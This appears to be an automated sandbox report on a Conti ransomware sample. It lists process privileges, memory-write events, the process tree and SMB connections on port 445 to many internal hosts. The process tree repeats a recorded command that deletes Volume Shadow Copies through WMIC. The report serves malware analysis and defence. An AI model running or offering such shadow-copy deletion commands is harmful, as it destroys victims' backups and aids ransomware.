Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1556 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 2724 wrote to memory of 2980 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 2724 wrote to memory of 2980 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 2724 wrote to memory of 2980 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 1556 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 2736 wrote to memory of 2976 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 2736 wrote to memory of 2976 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 2736 wrote to memory of 2976 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 1556 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1592 wrote to memory of 1852 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 1592 wrote to memory of 1852 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 1592 wrote to memory of 1852 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 1556 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 2632 wrote to memory of 2684 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 2632 wrote to memory of 2684 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 2632 wrote to memory of 2684 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 1556 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 2164 wrote to memory of 3068 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 2164 wrote to memory of 3068 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 2164 wrote to memory of 3068 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 1556 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1928 wrote to memory of 2044 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 1928 wrote to memory of 2044 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 1928 wrote to memory of 2044 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 1556 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 3032 wrote to memory of 1868 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 3032 wrote to memory of 1868 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 3032 wrote to memory of 1868 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 1556 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1972 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 1972 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 1972 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 1556 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 2940 wrote to memory of 1440 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 2940 wrote to memory of 1440 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 2940 wrote to memory of 1440 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 1556 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{84B23760-D083-4387-974D-3C4546D42F6A}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{84B23760-D083-4387-974D-3C4546D42F6A}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{7F4FF19A-F0A9-4D37-804C-BBA1AC496F39}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{7F4FF19A-F0A9-4D37-804C-BBA1AC496F39}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{9F6E7A5F-91E3-42B9-9E2A-D87FADA45EB4}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{9F6E7A5F-91E3-42B9-9E2A-D87FADA45EB4}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{314E70DD-6CC8-441F-8B30-A71AFD3666D4}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{314E70DD-6CC8-441F-8B30-A71AFD3666D4}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{F28370CD-B12E-4E29-BDEC-FADD070A311C}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{F28370CD-B12E-4E29-BDEC-FADD070A311C}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{9CFA1FAC-8B30-464C-A41C-E8A415E47E56}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{9CFA1FAC-8B30-464C-A41C-E8A415E47E56}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{CE807F35-9C0E-4446-B318-8485AF6C0259}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{CE807F35-9C0E-4446-B318-8485AF6C0259}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{ED089E91-80BF-4ED9-8981-C380E00AF48A}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{ED089E91-80BF-4ED9-8981-C380E00AF48A}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{D1A50FE4-92ED-419B-8E4F-FD59A2FB70FF}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{D1A50FE4-92ED-419B-8E4F-FD59A2FB70FF}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{95BCBF4B-AB01-429A-BC22-D699995F488D}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{95BCBF4B-AB01-429A-BC22-D699995F488D}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{D3411E52-7961-4272-BD9B-AC00A7C176FD}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{D3411E52-7961-4272-BD9B-AC00A7C176FD}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{5A5BC5FA-1945-4C64-98AB-48EB9B258476}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{5A5BC5FA-1945-4C64-98AB-48EB9B258476}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{4209BC2E-63F3-4311-B318-4266CE6427FD}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{4209BC2E-63F3-4311-B318-4266CE6427FD}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{0FB96D71-416E-4221-B050-53851A8DFEFF}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{0FB96D71-416E-4221-B050-53851A8DFEFF}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{CA9D1DC0-6918-4793-9B97-17DC4DC11B7A}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{CA9D1DC0-6918-4793-9B97-17DC4DC11B7A}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{5F3413EA-0DE7-4717-9100-512425AA05AF}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{5F3413EA-0DE7-4717-9100-512425AA05AF}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B69ED39F-CDDB-47E0-81FC-5EF4BC215C92}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B69ED39F-CDDB-47E0-81FC-5EF4BC215C92}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{C44555B4-BF9B-4600-B9BC-43446450A014}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{C44555B4-BF9B-4600-B9BC-43446450A014}'" delete

Network

Country Destination Domain Proto
N/A 10.127.0.1:445 tcp
N/A 10.127.0.49:445 tcp
N/A 10.127.0.64:445 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.54:445 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.59:445 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.51:445 tcp
N/A 10.127.0.60:445 tcp
N/A 10.127.0.45:445 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.0.50:445 tcp
N/A 10.127.0.48:445 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.55:445 tcp
N/A 10.127.0.133:445 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.47:445 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.0.53:445 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.132:445 tcp
N/A 10.127.0.37:445 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.63:445 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.41:445 tcp
N/A 10.127.0.52:445 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.65:445 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.56:445 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.61:445 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.58:445 tcp
N/A 10.127.0.43:445 tcp
N/A 10.127.0.62:445 tcp
N/A 10.127.0.0:445 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.46:445 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.57:445 tcp
N/A 10.127.0.102:445 tcp
N/A 10.127.0.77:445 tcp
N/A 10.127.0.90:445 tcp
N/A 10.127.0.89:445 tcp
N/A 10.127.0.68:445 tcp
N/A 10.127.0.80:445 tcp
N/A 10.127.0.119:445 tcp
N/A 10.127.0.98:445 tcp
N/A 10.127.0.76:445 tcp
N/A 10.127.0.114:445 tcp
N/A 10.127.0.79:445 tcp
N/A 10.127.0.122:445 tcp
N/A 10.127.0.110:445 tcp
N/A 10.127.0.113:445 tcp
N/A 10.127.0.109:445 tcp
N/A 10.127.0.117:445 tcp
N/A 10.127.0.66:445 tcp
N/A 10.127.0.94:445 tcp
N/A 10.127.0.130:445 tcp
N/A 10.127.0.70:445 tcp
N/A 10.127.0.71:445 tcp
N/A 10.127.0.67:445 tcp
N/A 10.127.0.86:445 tcp
N/A 10.127.0.104:445 tcp
N/A 10.127.0.93:445 tcp
N/A 10.127.0.106:445 tcp
N/A 10.127.0.78:445 tcp
N/A 10.127.0.115:445 tcp
N/A 10.127.0.118:445 tcp
N/A 10.127.0.124:445 tcp
N/A 10.127.0.128:445 tcp
N/A 10.127.0.83:445 tcp
N/A 10.127.0.91:445 tcp
N/A 10.127.0.105:445 tcp
N/A 10.127.0.95:445 tcp
N/A 10.127.0.99:445 tcp
N/A 10.127.0.69:445 tcp
N/A 10.127.0.75:445 tcp
N/A 10.127.0.82:445 tcp
N/A 10.127.0.85:445 tcp
N/A 10.127.0.127:445 tcp
N/A 10.127.0.87:445 tcp
N/A 10.127.0.111:445 tcp
N/A 10.127.0.123:445 tcp
N/A 10.127.0.129:445 tcp
N/A 10.127.0.74:445 tcp
N/A 10.127.0.97:445 tcp
N/A 10.127.0.108:445 tcp
N/A 10.127.0.126:445 tcp
N/A 10.127.0.88:445 tcp
N/A 10.127.0.116:445 tcp
N/A 10.127.0.92:445 tcp
N/A 10.127.0.101:445 tcp
N/A 10.127.0.73:445 tcp
N/A 10.127.0.96:445 tcp
N/A 10.127.0.121:445 tcp
N/A 10.127.0.112:445 tcp
N/A 10.127.0.100:445 tcp
N/A 10.127.0.103:445 tcp
N/A 10.127.0.120:445 tcp
N/A 10.127.0.125:445 tcp
N/A 10.127.0.84:445 tcp
N/A 10.127.0.81:445 tcp
N/A 10.127.0.107:445 tcp
N/A 10.127.0.72:445 tcp
N/A 10.127.0.145:445 tcp
N/A 10.127.0.161:445 tcp
N/A 10.127.0.144:445 tcp
N/A 10.127.0.160:445 tcp
N/A 10.127.0.189:445 tcp
N/A 10.127.0.159:445 tcp
N/A 10.127.0.181:445 tcp
N/A 10.127.0.141:445 tcp
N/A 10.127.0.199:445 tcp
N/A 10.127.0.183:445 tcp
N/A 10.127.0.170:445 tcp
N/A 10.127.0.191:445 tcp
N/A 10.127.0.140:445 tcp
N/A 10.127.0.166:445 tcp
N/A 10.127.0.142:445 tcp
N/A 10.127.0.173:445 tcp
N/A 10.127.0.134:445 tcp
N/A 10.127.0.158:445 tcp
N/A 10.127.0.175:445 tcp
N/A 10.127.0.174:445 tcp
N/A 10.127.0.188:445 tcp
N/A 10.127.0.190:445 tcp
N/A 10.127.0.147:445 tcp
N/A 10.127.0.157:445 tcp
N/A 10.127.0.187:445 tcp
N/A 10.127.0.176:445 tcp
N/A 10.127.0.178:445 tcp
N/A 10.127.0.150:445 tcp
N/A 10.127.0.153:445 tcp
N/A 10.127.0.165:445 tcp
N/A 10.127.0.182:445 tcp
N/A 10.127.0.151:445 tcp
N/A 10.127.0.152:445 tcp
N/A 10.127.0.154:445 tcp
N/A 10.127.0.138:445 tcp
N/A 10.127.0.180:445 tcp
N/A 10.127.0.131:445 tcp
N/A 10.127.0.186:445 tcp
N/A 10.127.0.162:445 tcp
N/A 10.127.0.184:445 tcp
N/A 10.127.0.146:445 tcp
N/A 10.127.0.193:445 tcp
N/A 10.127.0.171:445 tcp
N/A 10.127.0.136:445 tcp
N/A 10.127.0.148:445 tcp
N/A 10.127.0.135:445 tcp
N/A 10.127.0.169:445 tcp
N/A 10.127.0.177:445 tcp
N/A 10.127.0.192:445 tcp
N/A 10.127.0.185:445 tcp
N/A 10.127.0.139:445 tcp
N/A 10.127.0.197:445 tcp
N/A 10.127.0.167:445 tcp
N/A 10.127.0.163:445 tcp
N/A 10.127.0.164:445 tcp
N/A 10.127.0.156:445 tcp
N/A 10.127.0.149:445 tcp
N/A 10.127.0.155:445 tcp
N/A 10.127.0.137:445 tcp
N/A 10.127.0.168:445 tcp
N/A 10.127.0.198:445 tcp
N/A 10.127.0.196:445 tcp
N/A 10.127.0.143:445 tcp
N/A 10.127.0.172:445 tcp
N/A 10.127.0.179:445 tcp
N/A 10.127.0.194:445 tcp
N/A 10.127.0.195:445 tcp
N/A 10.127.0.238:445 tcp
N/A 10.127.0.244:445 tcp
N/A 10.127.0.253:445 tcp
N/A 10.127.0.224:445 tcp
N/A 10.127.0.225:445 tcp
N/A 10.127.0.232:445 tcp
N/A 10.127.0.220:445 tcp
N/A 10.127.0.243:445 tcp
N/A 10.127.0.254:445 tcp
N/A 10.127.0.245:445 tcp
N/A 10.127.0.204:445 tcp
N/A 10.127.0.211:445 tcp
N/A 10.127.0.200:445 tcp
N/A 10.127.0.249:445 tcp
N/A 10.127.0.221:445 tcp
N/A 10.127.0.203:445 tcp
N/A 10.127.0.213:445 tcp
N/A 10.127.0.251:445 tcp
N/A 10.127.0.229:445 tcp
N/A 10.127.0.227:445 tcp
N/A 10.127.0.209:445 tcp
N/A 10.127.0.248:445 tcp
N/A 10.127.0.207:445 tcp
N/A 10.127.0.240:445 tcp
N/A 10.127.0.242:445 tcp
N/A 10.127.0.210:445 tcp
N/A 10.127.0.201:445 tcp
N/A 10.127.0.215:445 tcp
N/A 10.127.0.237:445 tcp
N/A 10.127.0.219:445 tcp
N/A 10.127.0.231:445 tcp
N/A 10.127.0.226:445 tcp
N/A 10.127.0.247:445 tcp
N/A 10.127.0.214:445 tcp
N/A 10.127.0.223:445 tcp
N/A 10.127.0.233:445 tcp
N/A 10.127.0.236:445 tcp
N/A 10.127.0.246:445 tcp
N/A 10.127.0.206:445 tcp
N/A 10.127.0.212:445 tcp
N/A 10.127.0.202:445 tcp
N/A 10.127.0.239:445 tcp
